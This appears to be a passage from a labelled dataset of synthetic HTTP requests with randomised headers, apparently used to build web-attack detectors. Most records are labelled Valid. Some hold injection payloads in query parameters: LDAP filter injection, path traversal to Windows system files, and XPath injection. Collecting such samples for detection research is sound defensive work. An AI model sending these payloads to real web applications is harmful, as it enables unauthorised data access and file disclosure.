eeeteauageuh=h8&2gdsidaeHntoe=580&awamteet0liLan5=Nu&FEhsithesst0=p\0anClnon&1v3nYtlcVUC=&'teehevalp &naccess_logkth&heastraqvom=mb&petnm=zei&yrodtewtvcas=0325

End - Id: 39494
Start - Id: 18800
class: Valid
GET /rC/i6e-waQ/g@_/-eOjR.XFV/VLlQ.nsf? HTTP/1.0
Host: www.hhia.net:80
Connection: close
Accept: audio/basic;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=7835
Client-ip: 175.91.184.33
Cookie: nxsrrnae=tsno4rie;VZHoS=28444
Cookie2: $Version="83"
Date: Sat, 10 Jun 06 20:49:46 UTC
ETag: W/"3HCs5i7zVg3zw139a8"
Expect: 100-continue
From: nn9rr@wiueoi.biz
If-Modified-Since: Thu, 25 Nov 04 01:28:52 GMT
If-Unmodified-Since: Wed, 30 Sep 09 12:28:03 GMT
If-Match: *
If-None-Match: *
If-Range: "KSWLwTr1J7pfMKF"
Max-Forwards: 142
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: tnendI BbsfCEj=gydc
Authorization: ox3oE eri7ash=rsqtiuHe
Range: -26166
Referer: /maln94/bzsr/atdata/tobz/rpsgoeih.sh
TE: deflate;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.5 (Windows; U; Win98 2.5; 2h-me; rv:7.1.9) Gecko/65326766
UA-CPU: MIPS
UA-Disp: 983,4723,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 017x6703
Via: HTTP/0.9 www.iurt.png
Transfer-Encoding: deflate
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18800
Start - Id: 33400
class: Valid
POST /zPU3VcyrFDlK5VfdZyIT/tZPP/eiron/s3/sraThia/hsr/lMmC9wXowN1SJ/ao0e/9t./yIhazhewdlShed.html? HTTP/1.1
Content-Length: 164
Content-Language: erp
Content-Encoding: deflate
Content-Location: /4tOTzmp/aebd.avi
Content-MD5: b0Fud3JjbWgyYWlQdWVlbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 May 05 13:13:52 CET
Last-Modified: Sun, 11 Nov 07 22:00:45 CET
Host: www.gWiseuedf.it:95657
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257;q=0.6, windows-1257;q=0.0
Accept-Encoding: 
Accept-Language: nnex-Bh;q=0.2, csaep-t
Cache-Control: min-fresh=8858
Client-ip: 87.155.255.84
Cookie: Xwget0vk1bgsoundtmpqp-@=iall aeenjtalsdmj;erem3ht3xephf=57;5vhmcnlXetti=Tsw&8;pabE1twlt6eyg=HT
Cookie2: $Version="3"
Date: Thu, 26 Oct 06 24:33:14 GMT
ETag: "AmF0BoiNVYeVcln"
Expect: Hwnesico=noltdst
From: ooydtlh@tuohEicue.de
If-Modified-Since: Fri, 26 Aug 05 24:15:15 CET
If-Unmodified-Since: Sat, 12 Apr 08 17:03:57 UTC
If-Match: "aGZDR3JbIDKKXaY0Vh"
If-None-Match: "mmZddek2TjF0ODAl-"
If-Range: Tue, 04 Mar 08 18:11:01 GMT
Max-Forwards: 844
MIME-Version: 6.7
Pragma: ext='ueUaaun'
Proxy-Authorization: Digest realm
Authorization: Digest response="0AB6ba4C7fCfB85c58Db9b13dBad4De5"
Range: -45727
Referer: /m9dqtd/jhxPtt/rpaTdUd/nnheh1/elwtpD.png
TE: trailers
Trailer: Range
User-Agent: Mozilla/1.7 (compatible; LcxtD3; Unix; taoxrrj)
UA-CPU: x86
UA-Disp: 326,087,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 811x2728
Via: 1.2 www.eiaTye.jpeg, ot2O/5.6 210.73.35.49
Transfer-Encoding: compress
Upgrade: wcd8/1.3, hwe/0.4, aash/9.8, EsA/2.8
Warning: 454 98.218.12.151:008 "6Oim04" "Sat, 06 Nov 04 21:21:33 UTC"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

edse1eirifj4=3snsr&sornstt=V]e&Vsps20aosRL5kc=emttn0oedInils&fGawsi=immnesoa&bmhowohk8ttxomh=uslZe&.jX.=sAli]L4eatkfi)&a0twdgwe5eorn=0252&pq1lxmlIf=2363381363

End - Id: 33400
Start - Id: 37029
class: LdapInjection
GET /wXQEB/jR5TaEvAC/tFsmaccept67nPR/mailuHgEqAgEH4h64/wQE4xIRrh.mdb?0rii7ngbl=folR+fnet9betweeneds&neeineomsecehae=rZcfQDj4jiFS&7rErnA=syORtqa&2pmhttsr=bu%29%28%26%28objectClass++%3Ddh3*%29&sh2dqnj=oroea4ams HTTP/1.0
Host: www.plszea7st.com:80
Connection: iauhdn
Accept: text/*, application/rtf
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.0, compress, identity;q=0.6
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 102.194.71.136
Cookie: ntdtlaod=7678707788
Cookie2: $Version="1"
Date: Mon, 26 Sep 05 02:16:55 GMT
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Sat, 11 Jun 05 14:55:03 CET
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Oct 08 13:59:29 CET
Max-Forwards: 7932
MIME-Version: 3.0
Pragma: sgpo='rneptn'
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 952638-,75883-52
Referer: http://tnnAt.org/tpna.doc
TE: trailers
Trailer: Connection
User-Agent: caddbasede
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 0.7 204.253.165.17
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: seta/1.0, wmndNp/4.4
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37029
Start - Id: 45484
class: PathTransversal
GET /ioLjHCBNRfju6s@1KrK/NaetraE7Jo3dhaaeh/motnRrmnoio4ouha/tidmGe772WPV3WbZI-/ed/lcsinNYmstnhluet/group byqLd8/iRletr2eow0oRl5/oshhinquwlhIsirenhh/h839modsmaTcw5/euzonsVis.jsp?raOhewoc=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&aee1Job0Ees=253428&tgjiwhttn=234744&f8hvtsehttw=shsrn0&tmnr6o=cjmsi&anhwotWeee=dynteaCse8CH HTTP/1.1
Host: 38.148.118.21
Connection: close
Accept: application/postscript;q=0.8, image/gif;q=0.3, audio/basic;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=1
Client-ip: 53.223.189.118
Cookie: QXMu6W7VzS-=2917286770
Cookie2: $Version="39"
Date: Sat, 04 Oct 08 14:12:18 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Sat, 01 Sep 07 04:58:09 CET
If-Unmodified-Since: Thu, 15 Dec 05 22:06:26 UTC
If-Match: "P81d2kSqq7XukJFVE"
If-None-Match: *
If-Range: "KZt_3YzgCYNe3WW1QD"
Max-Forwards: 3183
MIME-Version: 3.1
Pragma: e=r3otnee
Proxy-Authorization: Digest username="hesa"
Authorization: NTLM YmhzbW5vbm40bW9vcmJ0ZXRwc3V0YnJ1b2l5cDN4cmljbGNleQ==
Range: 7-
Referer: /deoinhja/twSh5a/rAoE.htm
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.5 (compatible; Konqueror/3.3; WinNT; qedtboo; oRxsgiaa; anlxt2L)
UA-CPU: PowerPC
UA-Disp: 3626,740,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5163x468
Via: 5.1 www.truEqua.gif, 1.2 www.oHurtr.shtml, FTP/9.4 www.oLlaoa.jpeg
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45484
Start - Id: 18066
class: Valid
GET /9Q/2e21xeeosit03opw/rittfy4cqKiri/9jVMMtg31OV/4atectU3eesih/hSenwYl0r7GrUxtBMX47/s.tO067Gn9sGvXt8reL/f6lWWbfO2/d-/ia/lD/nnon0piel.sh? HTTP/1.0
Host: www.miEoasdR.biz
Connection: keep-alive
Accept: application/*;q=0.7
Accept-Charset: x-mac-arabic, windows-1251
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 239.154.156.143
Cookie: w81n=ohuo;zK7lsopen5plikeGW=nmmanano
Cookie2: $Version="70"
Date: Fri, 06 Mar 09 15:05:23 GMT
ETag: "SiTkbb.5aR7i804En"
Expect: 100-continue
From: ubo9@noxriwRe.cz
If-Modified-Since: Fri, 14 Oct 05 12:51:07 CET
If-Unmodified-Since: Fri, 28 Sep 07 23:49:53 GMT
If-Match: *
If-None-Match: *
If-Range: "wme5B43QYs31S0-"
Max-Forwards: 9760
MIME-Version: 3.6
Pragma: pw9ds=6t
Proxy-Authorization: nagit ilrhne=uTamR
Authorization: Basic N2hub3RPZjp5aTl4c2hv
Range: 955815-429,91164-5504
Referer: /mihzf/tlekdt/octn/iYSieen/hNst.avi
TE: chunked;q=0.9,chunked
Trailer: If-Match
User-Agent: Mozilla/4.4 (Windows; U; Win98 4.6; es-rt; rv:4.1.9) Gecko/27163245
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: HTTP/1.9 198.11.126.191, ttteiv/0.5 247.98.198.86
Transfer-Encoding: hpt5i
Upgrade: pcVooi/8.0, teny6/2.3
Warning: 781 78.175.59.108 "s0atoompRe" 
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 507009022926065
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18066
Start - Id: 3457
class: Valid
GET /1dqlfciiteirag/2iSaimg7acceptE.6id/ugtsabmuhva/lRT3E_gskqqWE9K5ab-6/mPH.-7oQG9exec8all/lONwecsNbYfwuiass.msf?yknn=i+tnbvim9&9oq=2964&pOC2wPfC=oWAOsasDnsm&8zA3DIs=hrt4s6teRsUeh&mayo=93303&GRVnB=Hest%40 HTTP/1.0
Host: www.YeovdAkri.uk:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: RRe-Iskee, dN7-2e;q=0.3, eosw-e, hsrel-lt;q=0.5, tn2prSR-riOenpua
Cache-Control: no-cache
Client-ip: 101.68.144.153
Cookie: sgwr=0asgeeuId2ohbwye7;sboEuxeimnha=u;nss= ;n2om0rit26mt=rtds2eyt6byp24udt8;Qx6=84
Cookie2: $Version="276"
Date: Tue, 01 May 07 20:48:59 GMT
ETag: "AN4.nNkM_srLbHg"
Expect: Ueo8n=huroAR68
From: 4aSoxaoo@yges.it
If-Modified-Since: Wed, 03 Mar 04 23:07:48 UTC
If-Unmodified-Since: Wed, 19 Apr 06 15:22:39 GMT
If-Match: "DTamJlMARellTpUQue-"
If-None-Match: "-B.zPAF3pHmMvIUqgbSI"
If-Range: *
Max-Forwards: 9
MIME-Version: 0.0
Pragma: maulgmh='hfwtm'
Proxy-Authorization: r5le hmnr=ywltxE
Authorization: Digest cnonce="rlhc8"
Range: 516789-
Referer: http://w6TcNei.ch/pee4/eeafa/sleTo/0meTsAgl.pl
TE: chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: oiLTRy http://www.edKlc5.ch
UA-CPU: MIPS
UA-Disp: 661,945,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8177x498
Via: dgaae/2.2 252.96.117.151, 3.3 www.rsen.png:1
Transfer-Encoding: identity
Upgrade: he2aGa/7.2, t4cmu/0.8
Warning: 341 98.142.108.251 "04lnsrolao" "Sat, 17 Jan 04 10:07:50 CET"
X-Forwarded-For: 118.211.6.212
X-Serial-Number: 0147669
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3457
Start - Id: 443
class: Valid
GET /mcv7qCMQ2from.sh?yByyiPq=lmaxterm+teshe%3Fee%3D+phu&41hel=0896743&letetytuzsa1=atdupNi- HTTP/1.0
Host: www.syqet1een.fr:49428
Connection: ilyoi
Accept: video/mpeg;q=0.0, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: sb-at5tAcdn, 4-ochh
Cache-Control: min-fresh=92372
Client-ip: 245.193.75.230
Cookie: Rn=segqkaEnmeCy;wThC=tynys3onidehj3atno;7tnoaWao=denhv;eaiiObbfjrtSp=20;mpi=Ii;itaoe=s 
Cookie2: $Version="63"
Date: Fri, 06 Jul 07 07:31:58 CET
ETag: W/"YDYaSnlQSdor_IUB"
Expect: 100-continue
From: ewncfsg@Sxdeoy.ch
If-Modified-Since: Sun, 16 Nov 08 15:38:24 GMT
If-Unmodified-Since: Sun, 17 Apr 05 22:05:59 UTC
If-Match: *
If-None-Match: "bR70N@ja44bcNV7D_35E"
If-Range: Tue, 20 Nov 07 11:09:46 GMT
Max-Forwards: 7
MIME-Version: 3.6
Pragma: cps1ewt='iivh'
Proxy-Authorization: Digest nc=5ADEebbC
Authorization: Basic dG5uZzpsaWFpY2FyVw==
Range: 662-0,7857-
Referer: http://www.diosl5t.net/wggnfg/aNzI/oiRmb3.wmn
TE: trailers,deflate;q=0.9
Trailer: Authorization
User-Agent: Mozilla/3.8 (X11; U; Linux i586 7.0; ee-tC; rv:2.8.9) Gecko/73258352
UA-CPU: Sparc
UA-Disp: 506,620,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7545x2141
Via: 5.1 6.182.83.116:363
Transfer-Encoding: Ssdtu; sUuer=yAv8
Upgrade: t9us/7.5, ceVt/6.8, Anu/0.3, Hli/0.3, y9t/6.4
Warning: 165 63.14.111.126 "qkeq62sh" "Sat, 26 Nov 05 06:33:06 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 9170010950
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 443
Start - Id: 4895
class: Valid
POST /logD1pyS@-HzPUrG/iy4RjyU/I0sgttTs5olmr/2S5kr/m4awerbab/ci5tnsurodemaC0tna/s6y.QuGT73ayT/at9yagtiiiAuzdis.html? HTTP/1.1
Content-Length: 185
Content-Language: Aoi,eotnttd,Eost
Content-Encoding: deflate
Content-Location: /ai9d.bin
Content-MD5: cm9pYWUwaVR6ZVppZW53cw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Apr 04 19:35:36 UTC
Last-Modified: Wed, 04 Jan 06 04:46:35 GMT
Host: www.ibeigohd.net:80
Connection: close
Accept: text/html;q=0.4
Accept-Charset: hz-gb-2312;q=0.1, windows-1251;q=0.8, gb2312, iso-8859-8-i;q=0.0, iso-8859-9
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 225.111.135.85
Cookie: aosl=dotftrqn;pt=24529592;sh8ncmG88tadunf=ot-E8rt=?vexecchilden&4etn;txmntftct7aan0l=04;heOsamoMndtwaej=pe9l
Cookie2: $Version="471"
Date: Wed, 01 Oct 08 12:43:24 UTC
ETag: W/"4MNvm9CZnKoE8O05O5"
Expect: 3ohexet
From: itds3@bta1toaaio.be
If-Modified-Since: Mon, 18 Sep 06 07:20:07 UTC
If-Unmodified-Since: Wed, 19 Sep 07 21:24:30 CET
If-Match: "B_n8J@XtJ-SNLpyT"
If-None-Match: "xeQoDg7K5epoeauh6YWg"
If-Range: Fri, 12 Jun 09 04:55:50 UTC
Max-Forwards: 148
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: hjpc yezrrse2=petppow
Authorization: Basic dGpnMmk6dHBhOE5z
Range: 700323-3,56039-78431,91-43
Referer: http://hcrn.uk/iiawi0/2atefetd/ptelter/ahdfaql.cfm
TE: trailers
Trailer: Referer
User-Agent: esbeaoekgumh0
UA-CPU: x86
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 5493x774
Via: 8.1 136.48.189.204
Transfer-Encoding: deflate
Upgrade: slri/0.7, 9edsi/8.5, nseAhi/5.8, ieotoo/2.0, eib/9.5
Warning: 918 94.49.114.205 "tstiayw" 
X-Forwarded-For: 85.213.238.100
X-Serial-Number: 625096435870938677
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yair7mOrasr2oei=op4&escbn6ine1Hsle=iformnIsh&Nm=eei]eisinputdn9ftpr&ciNMFE=sbgsoundaccess_loge&pmsyearcRcnr=tlsCG&coltnokrot=13447&yat91phadeenb=t7Stosa&hrIbnOecOimsrm=7&hhssv6=eeecum

End - Id: 4895
Start - Id: 31933
class: Valid
GET /u2B2KeouUn/jlEDHpPZIdt/qk5LidRlsAeV/e8iuE4rlhks4.jpg? HTTP/1.1
Host: www.bXi4hena2p.it
Connection: 6ael6l
Accept: */*;q=0.0
Accept-Charset: iso-8859-1, iso-8859-1;q=0.2, gb2312
Accept-Encoding: identity;q=0.6, gzip;q=0.0
Accept-Language: sOcbi-i;q=0.0, nI-emttct, nsjTmro-e;q=0.9, ed-dnicwtpx
Cache-Control: eqt8en='dntihy'
Client-ip: 26.219.14.238
Cookie: eOeemh6iasj9lA=iq-61F
Cookie2: $Version="2"
Date: Sun, 21 May 06 08:34:54 UTC
ETag: "PyXpT62prgMAMFo"
Expect: rseO6aia=rtoc;snndhheg=satai
From: to1tnnt@haeslhaccn.uk
If-Modified-Since: Mon, 27 Nov 06 09:17:46 GMT
If-Unmodified-Since: Tue, 06 Apr 04 24:37:51 UTC
If-Match: ".Fh5RRRCis7fF205"
If-None-Match: "L1SB1asdVb40m5JnH"
If-Range: "ZEjMGInXOsYPZ_dj"
Max-Forwards: 1119
MIME-Version: 2.3
Pragma: o='bw'
Proxy-Authorization: Digest username="nesor"
Authorization: NTLM aWVvaG1pZkFvRWNhZm9PbE5tU3Rsbm9sb294dHNjbjI=
Range: -8,3314-2228
Referer: /isIe/o0Aetl7/ko1ucl/rseelasi/zm7nlqt.doc
TE: trailers
Trailer: Expect
User-Agent: Mozilla/7.3 (Machintosh; U; PPC Mac OS X 9.2; 4u-sm; rv:0.0.1) Gecko/28817704
UA-CPU: 68000
UA-Disp: 0617,6315,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 576x144
Via: 4.9 www.hilbe.shtml
Transfer-Encoding: iftety
Upgrade: nKety0/5.6, wZTeeb/7.6
Warning: 131 www.apir.html "lnAgieyr2dmtfnwy" 
X-Forwarded-For: 159.180.214.45
X-Serial-Number: 50617070413
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31933
Start - Id: 17111
class: Valid
GET /gunoaea/noemsn/seaYhxtu/uZW/ittdaetlr1bfe4sEa/_include/tiedrcpkehsuosiarogl/lcFPU/7etdlsueaosia9exd8/s321fgWSn2NgT2.swf? HTTP/1.1
Host: 158.72.205.251
Connection: 4uter
Accept: audio/basic;q=0.0
Accept-Charset: koi8, cp-932;q=0.3, cp-936, x-mac-arabic;q=0.5
Accept-Encoding: identity, identity, deflate;q=0.8
Accept-Language: *
Cache-Control: seSamo5k=eaafw
Client-ip: 55.33.105.236
Cookie: OxlrtirTo=axAOo-1;cIdteodoptiUTna=>bdr5lnsnbZuoer;nb5trndi=fIlmphE
Cookie2: $Version="59"
Date: Wed, 25 Apr 07 14:22:31 UTC
ETag: W/"Dg5zclpWresAC-p1"
Expect: ebpsa=omltsd;y5ns9=sp1Eidj
From: eeootn2@riitt3.org
If-Modified-Since: Sun, 24 Jan 10 05:57:49 CET
If-Unmodified-Since: Mon, 27 Apr 09 06:05:50 GMT
If-Match: *
If-None-Match: "mcpXB9G80Lqvh405G71"
If-Range: Sun, 22 Jul 07 10:06:01 GMT
Max-Forwards: 8
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM NGdydGhxaGlFZnJlZW9ub2x1ZUNzc3dubnNvUmxuZnMybWg5aTN0cjZkaXQ=
Authorization: Basic dGRsM2lsOnN2aWlubmM=
Range: 014372-8712,-65,1852-9631
Referer: http://loqkmA.be/ewh0/ndorvoa/o1n2y7.php3
TE: trailers,gzip;q=0.0
Trailer: From
User-Agent: mPIf@7Yq0 http://www.1eped.gov
UA-CPU: x86
UA-Disp: 3306,320,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4914x5963
Via: janue/5.9 www.ezNF.jpeg, FTP/5.2 www.scou.gif
Transfer-Encoding: deflate
Upgrade: uqn7/3.0, adaoI/9.1, aossv/2.2, skt5nb/9.3
Warning: 816 www.eedo.htm "sdali2e4bw" 
X-Forwarded-For: 22.117.12.85
X-Serial-Number: 17174419292129745419
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17111
Start - Id: 49668
class: XPathInjection
GET /e3q0Xqe_Y8om9/ThomeaY/izNWRN3X7Lf/m4adutnawecroid30agO/gHm62Eo07m/dkhifeRnheteieuup/0MRmCQ7QKDB6/n5ITfxde/jIzLUhIh101/vQy6OOIlsU.htm?nohtPSnaesalt=ht&8s=r0i&services4I3a=ettti&Dazgsmu=9301++++or++++1%3C+io%2Fnbai%2Ff%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D7%5D++++or++385%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&trjo8mihfasne=pf2o2atVf&v1execlogkB@D=d+%27%265aeiwrsu6hpuotr&ulotEns8yeTwmyt=547166351&Osupoet6mhnc=350554&yeiaAvN=th&dfalRf2mt3eel=azprtxwherenchildlo&lNqc1=1620959&GteE=3791073&Aupgnarleso=vtect HTTP/1.0
Host: www.iRhieFrsga.st
Connection: ttehsSs
Accept: audio/x-wav, video/mpeg;q=0.2
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.4, gzip;q=0.3, identity, identity
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 74.210.240.133
Cookie: tywd=urbenmzpion;fh=e s3=bnn;l8ijpevdnteaeT=5781;zSpFihA=e ew0;aylTN=&oamailw6e> nodee
Cookie2: $Version="35"
Date: Mon, 01 Feb 10 17:23:42 UTC
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Sat, 30 Jul 05 17:39:23 CET
If-Unmodified-Since: Thu, 06 Sep 07 01:28:19 UTC
If-Match: "jQr7J.zq5xy30IuNZ"
If-None-Match: *
If-Range: Wed, 04 Mar 09 13:52:13 UTC
Max-Forwards: 7279
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest nc=F7AF82f1
Authorization: Basic cW9pb3NzOmVvdW5t
Range: 7083-858216,-723,8872-
Referer: /n5ar/aarpterA.msf
TE: trailers
Trailer: Range
User-Agent: nHtgAd/9.9.6.4.2
UA-CPU: Sparc
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 176x3474
Via: FTP/7.2 www.5ntO.js, 3.6 195.168.108.149, 1.1 172.125.86.73
Transfer-Encoding: gzip
Upgrade: nn7ooi/9.0
Warning: 044 www.ewuqbi.js "trhiteoe9" 
X-Forwarded-For: 73.197.107.241
X-Serial-Number: 642097
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49668
Start - Id: 36018
class: PathTransversal
GET /reipmttcbse/iEW0Y5.sh?baunoqlliofib=31293&beEhdYnrevvtm=lomstadhic9sieT&Id=%5Cautoexec.bat&Vr1Jermo5=soNuoenFooh%5Dto&hu76egkinyIy=hlhh HTTP/1.0
Host: 72.87.145.230:80
Connection: 9itmb
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: duZde-ht;q=0.2, 3eN4ru-i;q=0.3, Finnoiy-t3ee;q=0.9
Cache-Control: honhdms=epoae
Client-ip: 102.220.30.54
Cookie: rbxepnbztteeee=0hehmwriVe6aHi;jaajAeEl=9855173220;yehniun=s;InupdatekliZd1XeK=ro 1;gyne=hAh6Ssp;eat=3kt
Date: Fri, 29 Sep 06 01:39:37 UTC
Expect: 100-continue
From: e1ea@teeopdrn.uk
If-Unmodified-Since: Tue, 13 Apr 10 09:55:23 CET
If-Match: *
If-None-Match: "kdghtZWIRXRIPxNpWKB4"
Max-Forwards: 2
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: i3Ele gosEtzs0=hEese
Referer: /wmtydpsr/feeu.php3
TE: trailers,trailers
Trailer: Host
User-Agent: qubqGMohd http://www.gepeoha6.be
UA-Color: color8
Via: 8.3 www.Agnadl.tiff
Warning: 550 140.13.48.198 "z9natieLeldihi1yr" 
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36018
Start - Id: 49685
class: XPathInjection
GET /ht1hahq/fbnBMF4oYu.fsYJt_6/KGqg/RorsRI/AWbT5i/7min0s/uot8nx/xxhavings5RtxB.swf?eiqaowzidih=htrJzO59oJgs&ars=79773&Ehakg=eThbgsoundt&@k8feval0Ta=ulusralltXo2libmbewinnt+document&imxw0a0hhenh=Pog&oqb5trntQ=si9orEn5dihe6&gi9losw=egiohl&sZnodeCF5=305&eeese=eMeleEDehinrtyrN&mbbY=69550&rweiLsaanrwl=r%3E%5Ck7-catta%3Bd+hwer+Ne&taftrty=27629631&xhftelnetQA47gt@4=2eZuprq%27++or+++o0a%2Fttcue%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D143%5D++or+++++%27lt4amq%27++++%3D+++%27&Tf8li@9t=ney HTTP/1.0
Host: www.poqdu.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: se-see;q=0.9, e7-w16yl, Arre-e, raereee-gC, 2-ex
Cache-Control: max-stale=1020
Client-ip: 223.106.137.113
Cookie: ettcnYo=dSJgph;rf=00;yoetci8ct4=mrYL8CYoYtH-;hphseh4AgeE=0509
Cookie2: $Version="176"
Date: Sun, 13 Feb 05 19:11:55 UTC
ETag: "kEZV4g66j0qldaMaD"
Expect: ah5e
From: earb@naiA.org
If-Modified-Since: Tue, 24 Jul 07 12:56:21 UTC
If-Unmodified-Since: Fri, 18 Jul 08 02:13:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 78
MIME-Version: 2.9
Pragma: eftdar='emofree'
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: Digest nc=F05b7A23
Range: -09
Referer: /tnEDtt.pdf
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: rrootenttnetotiavi
UA-CPU: StrongARM
UA-Disp: 8272,159,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: 8.3 134.199.183.150:152
Transfer-Encoding: gzip
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49685
Start - Id: 8127
class: Valid
GET /r_b.msf?Invq=es+n+Usnfomn&om=e+ryceSn%5Dit&wrtcasis=bns6lrs&lDiW.fwJ=h8gchild%3D2+where%2F+ehi+e%2Fr&fsro=ou&hptcDmasmilii=60341195&nw0aeec=%26i%28ftsAcadenjfn&44uwvc0osheer=s9tbb&cuoern=26194156&htyho=%3B%28 HTTP/1.1
Host: www.jlsen.be
Connection: omsni1
Accept: video/*, image/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=25
Client-ip: 143.75.57.209
Cookie: Lz@2tfKk=e;CE9services6ljV.B=87DryDrHoUgb;1qjAo=acETool
Cookie2: $Version="361"
Date: Fri, 20 Jul 07 01:02:04 UTC
ETag: "4uEXMjC_PtDC8blUz"
Expect: eeuhpN
From: Dsersuin@iraarby6eg.be
If-Modified-Since: Tue, 22 Jun 04 20:44:39 CET
If-Unmodified-Since: Wed, 25 Nov 09 01:04:09 GMT
If-Match: *
If-None-Match: "ospBUIkz_rdx@sH"
If-Range: Wed, 21 Jun 06 10:11:37 GMT
Max-Forwards: 563
MIME-Version: 8.5
Pragma: tyEp='at9sbef'
Proxy-Authorization: Digest response="2b79C4EDCA0d95fFbDfB52b2ADbdd7C0"
Authorization: Digest nonce
Range: 96926-503180,-72
